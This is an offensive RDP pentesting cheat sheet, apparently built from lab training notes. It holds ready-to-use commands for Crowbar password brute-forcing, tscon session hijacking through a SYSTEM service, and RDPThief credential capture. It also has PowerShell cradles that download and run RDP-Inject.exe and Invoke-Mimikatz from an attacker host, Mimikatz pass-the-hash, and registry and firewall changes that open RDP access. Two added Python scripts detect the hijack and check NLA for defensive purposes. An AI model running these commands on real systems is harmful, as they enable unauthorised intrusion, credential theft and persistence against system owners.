Pentesting RDP

CROWBAR

  • Remote desktop protocol with Crowbar

    • Crowbar is a network authentication cracking tool

sudo apt install crowbar
  • Make a suitable wordlist

  • Attempt to brute-force RDP

crowbar -b rdp -s $host/32 -u admin -C /usr/share/wordlists/rockyou.txt -n 1 -v
# -b protocol
# -s target server (CIDR notation)
# -C wordlist of candidate passwords
# -n number of threads (RDP doesn't reliably handle multiple threads)
  • If you hit errors such as "File Not Found", convert the wordlist to UTF-8:

iconv -f ISO-8859-1 -t UTF-8 /usr/share/wordlists/rockyou.txt > rockyou_utf8.txt

RDP Session Hijacking

  • Requires SYSTEM privileges

query user
# lists the active and disconnected sessions together with their IDs
  • https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/tscon

tscon #{TARGET_SESSION_ID} /dest:#{OUR_SESSION_NAME}
# or run tscon as SYSTEM by wrapping it in a service
sc.exe create sessionhijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#0"
net start sessionhijack
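The service-based tscon hijack above is visible in the event log: the sc.exe create call leaves a System 7045 service-install record with tscon in its ImagePath, and tscon itself shows up in a Security 4688 process-creation record when command-line auditing is enabled. The script below, added here and not part of the original notes, matches that pattern over constructed sample records; the field names follow the Windows event XML and every sample value is made up.

```python
"""Flag the tscon session-hijack pattern in Windows event records (constructed sample data)."""
import re

# 'tscon <session id> /dest:<session name>' as it appears in a service ImagePath or a 4688 CommandLine
TSCON_RE = re.compile(r"\btscon(?:\.exe)?\s+(\d+)\s+/dest:(\S+)", re.IGNORECASE)

# Constructed records shaped like System 7045 (service installed) and Security 4688
# (process created; CommandLine is only present when command-line auditing is enabled)
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "sessionhijack", "AccountName": "LocalSystem",
     "ImagePath": "cmd.exe /k tscon 1 /dest:rdp-tcp#0"},
    {"EventID": 4688, "SubjectUserName": "SYSTEM",
     "NewProcessName": r"C:\Windows\System32\tscon.exe", "CommandLine": "tscon 3 /dest:console"},
    {"EventID": 4688, "SubjectUserName": "joe",
     "NewProcessName": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
    {"EventID": 7045, "ServiceName": "Spooler", "AccountName": "LocalSystem",
     "ImagePath": r"C:\Windows\System32\spoolsv.exe"},
]


def detect_tscon_hijack(events):
    """Return a finding for every service install or process creation that runs tscon with /dest:."""
    findings = []
    for ev in events:
        eid = ev.get("EventID")
        if eid == 7045:          # a service whose binary path invokes tscon runs it as SYSTEM
            text, context = ev.get("ImagePath", ""), f"service {ev.get('ServiceName')!r}"
        elif eid == 4688:        # tscon launched directly; SYSTEM as the subject is the tell
            text, context = ev.get("CommandLine", ""), ev.get("NewProcessName", "")
        else:
            continue
        m = TSCON_RE.search(text)
        if m:
            findings.append({"event_id": eid, "hijacked_session": int(m.group(1)),
                             "dest_session": m.group(2), "context": context})
    return findings


if __name__ == "__main__":
    for finding in detect_tscon_hijack(SAMPLE_EVENTS):
        print(finding)
```

Legitimate administrators also use tscon, so treat the 4688 hits as a lead and the 7045 hits (tscon wrapped in a freshly installed service) as the strong signal.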

SHARP RDP

SharpRDP.exe computername=appsrv01 command="powershell -c IEX" username=corp\dave password=lab

RDP Thief

  • rdpthief.dll must be on the local machine

  • Modify the C# source with the location of the hidden RDPThief.dll on disk

  • RDP-Inject.exe (C#) runs in a while loop and injects into each RDP process in order to capture the credentials entered into RDP

  • Dump captured credentials

type C:\Users\User\AppData\Local\Temp\3\data.bin
$wc = New-Object System.Net.WebClient; $wc.Headers['User-Agent'] = [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome; $data = $wc.DownloadData('http://192.168.49.124/RDP-Inject.exe');$assem = [System.Reflection.Assembly]::Load($data);$entryPointMethod = $assem.GetTypes().Where({ $_.Name -eq 'Program' }, 'First').GetMethod('Main', [Reflection.BindingFlags] 'Static, Public, NonPublic');$entryPointMethod.Invoke($null, (, [string[]] ('foo', 'bar')))
  • The above command pulls RDP-Thief's RDP-Inject.exe from a remote web server and loads it via PowerShell reflection. Update the URL and arguments in the command before use.

Screenshot the Desktop

  • You can take a screenshot of the desktop if NLA is disabled

  • With netexec (rdp protocol), the relevant options are:

--nla-screenshot
--screenshot
--screentime SCREENTIME
  • Resolution as WxH (default 1024x768):

--res RES

Enable RDP via Crackmapexec

crackmapexec smb 10.129.203.121 -u julio -p Password1 -M rdp --options 
crackmapexec smb 10.129.203.121 -u julio -p Password1 -M rdp -o ACTION=enable

Enable RDP via Registry

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 
netsh advfirewall firewall add rule name=3389 protocol=TCP dir=in localip=any localport=3389 action=allow

Enable RDP access for user

net localgroup "Remote Desktop Users" joe /add
Add-LocalGroupMember -Group 'Remote Desktop Users' -Member robert.lanza 
powershell -c 'Add-LocalGroupMember -Group "Remote Desktop Users" -Member john' 
powershell -c 'Add-LocalGroupMember -Group "Remote Desktop Users" -Member alice'

Remove Remote Desktop Access for user

Remove-LocalGroupMember -Group "Remote Desktop Users" -Member robert.lanza

If PTH is Disabled

  • Enable Restricted Admin mode

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

RDesktop

rdesktop 10.11.1.13 -u xxx -p xxx
rdesktop 10.129.131.50 -u htb-student -p 'HTB_@cademy_stdnt!'
  • Mount folders using RDesktop

rdesktop 10.129.131.50 -u htb-student -p 'HTB_@cademy_stdnt!' -r disk:linux='~/tools'

XFreeRDP

xfreerdp /v:$host /u:administrator /cert:ignore
xfreerdp /v:10.11.1.31 /u:sa /p:poiuytrewq /cert:ignore
  • /cert:ignore accepts whatever certificate the server presents, so untrusted or self-signed certificates do not block the connection

xfreerdp /v:10.129.131.50 /u:htb-student /p:'HTB_@cademy_stdnt!' /dynamic-resolution
xfreerdp /v:10.11.1.247 /port:1234 /u:brett /p:ilovesecuritytoo
  • Share a folder from our attacker machine into the RDP session on the target (drive redirection)

mkdir /tmp/filetransfer
xfreerdp /v:10.129.131.50 /u:htb-student /p:'HTB_@cademy_stdnt!' /drive:~/tools
# ERROR: if you encounter the error below, add the /tls-seclevel:0 switch to the xfreerdp command
# [ERROR][com.freerdp.core] - transport_connect_tls:freerdp_set_last_error_ex ERRCONNECT_TLS_CONNECT_FAILED
/tls-seclevel:0
  • Other xfreerdp invocations with options that have been useful in the past

xfreerdp /v:manageengine /u:Administrator /p:studentlab /cert:ignore /tls-seclevel:0 /timeout:80000 /size:1920x1010 /scale:50
xfreerdp /u:blwasp /p:'Password123!' /v:10.129.230.38 /dynamic-resolution /drive:.,linux /bpp:8 /compression -themes -wallpaper /clipboard /audio-mode:0 /auto-reconnect -glyph-cache

Pass The Hash RDP

xfreerdp /u:domain\username /pth: /v:$host
  • If PTH is disabled, enable Restricted Admin mode

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

PTH RDP From a Windows machine

sekurlsa::pth /user:admin /domain:corp1 /ntlm: /run:"mstsc.exe /restrictedadmin"

$wc = New-Object System.Net.WebClient; $wc.Headers['User-Agent'] = [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome; $wc.DownloadString('http://192.168.49.120/Invoke-Mimikatz.ps1') | IEX
Invoke-Mimikatz -Command '"sekurlsa::pth /user:admin /domain:corp1 /ntlm: /run:mstsc.exe /restrictedadmin"'

Nmap

nmap -sV -sC 10.129.201.248 -p3389 --script rdp*

RDP Security Check

sudo cpan
# inside the cpan shell:
install Encoding::BER
git clone https://github.com/CiscoCXSecurity/rdp-sec-check.git && cd rdp-sec-check
./rdp-sec-check.pl $host
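The desktop-screenshot trick above depends on NLA being off, and rdp-sec-check answers that question by sending X.224 Connection Requests with different requestedProtocols values (MS-RDPBCGR 2.2.1.1) and reading the server's Connection Confirm. The Python below is an added example, not code from the original page or from rdp-sec-check: it builds the request, parses the response, and reports NLA as enforced when a TLS-only request is refused with HYBRID_REQUIRED_BY_SERVER; `probe()` runs the live exchange against a host you are authorised to assess, and the parsing functions work offline on captured bytes.

```python
"""Check which RDP security layers a server accepts via X.224 negotiation (MS-RDPBCGR 2.2.1.1)."""
import socket
import struct

# requestedProtocols / selectedProtocol values
PROTOCOL_RDP, PROTOCOL_SSL, PROTOCOL_HYBRID = 0x0, 0x1, 0x2
NEG_RSP, NEG_FAILURE = 0x02, 0x03
FAILURE_CODES = {1: "SSL_REQUIRED_BY_SERVER", 2: "SSL_NOT_ALLOWED_BY_SERVER",
                 3: "SSL_CERT_NOT_ON_SERVER", 4: "INCONSISTENT_FLAGS",
                 5: "HYBRID_REQUIRED_BY_SERVER", 6: "SSL_WITH_USER_AUTH_REQUIRED_BY_SERVER"}


def build_x224_cr(requested_protocols: int) -> bytes:
    """TPKT header + X.224 Connection Request carrying an RDP_NEG_REQ."""
    neg_req = struct.pack("<BBHI", 0x01, 0x00, 8, requested_protocols)  # type, flags, length, protocols
    tpdu = bytes([0xE0, 0, 0, 0, 0, 0]) + neg_req   # CR code, DST-REF, SRC-REF, class 0
    tpdu = bytes([len(tpdu)]) + tpdu                # length indicator (LI) prefix
    return struct.pack(">BBH", 3, 0, 4 + len(tpdu)) + tpdu


def parse_x224_cc(data: bytes) -> dict:
    """Interpret the server's Connection Confirm: accepted protocol, failure code, or legacy server."""
    if not data:
        return {"kind": "closed"}                    # some servers just drop the connection
    if len(data) < 11 or data[0] != 3 or data[5] != 0xD0:
        raise ValueError("not an X.224 Connection Confirm")
    if data[4] == 6:                                 # LI 6: no rdpNegData, pre-RDP 6.0 server
        return {"kind": "legacy", "protocol": PROTOCOL_RDP}
    neg_type, _flags, _length, value = struct.unpack_from("<BBHI", data, 11)
    if neg_type == NEG_RSP:
        return {"kind": "rsp", "protocol": value}
    if neg_type == NEG_FAILURE:
        return {"kind": "failure", "code": FAILURE_CODES.get(value, hex(value))}
    raise ValueError(f"unexpected rdpNegData type {neg_type:#x}")


def nla_enforced(ssl_only_result: dict) -> bool:
    """A TLS-only request refused with HYBRID_REQUIRED_BY_SERVER means NLA (CredSSP) is mandatory."""
    return ssl_only_result.get("code") == "HYBRID_REQUIRED_BY_SERVER"


def probe(host: str, port: int = 3389, timeout: float = 5.0) -> dict:
    """One TCP connection per requested protocol; the server ends the connection after a failure."""
    results = {}
    for name, proto in (("RDP", PROTOCOL_RDP), ("SSL", PROTOCOL_SSL), ("HYBRID", PROTOCOL_HYBRID)):
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(build_x224_cr(proto))
            results[name] = parse_x224_cc(s.recv(1024))
    results["nla_enforced"] = nla_enforced(results["SSL"])
    return results


if __name__ == "__main__":
    import sys
    print(probe(sys.argv[1]))
```

A "rsp" result for the RDP-only request means the server still accepts standard RDP security, which is the weakest configuration rdp-sec-check warns about.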
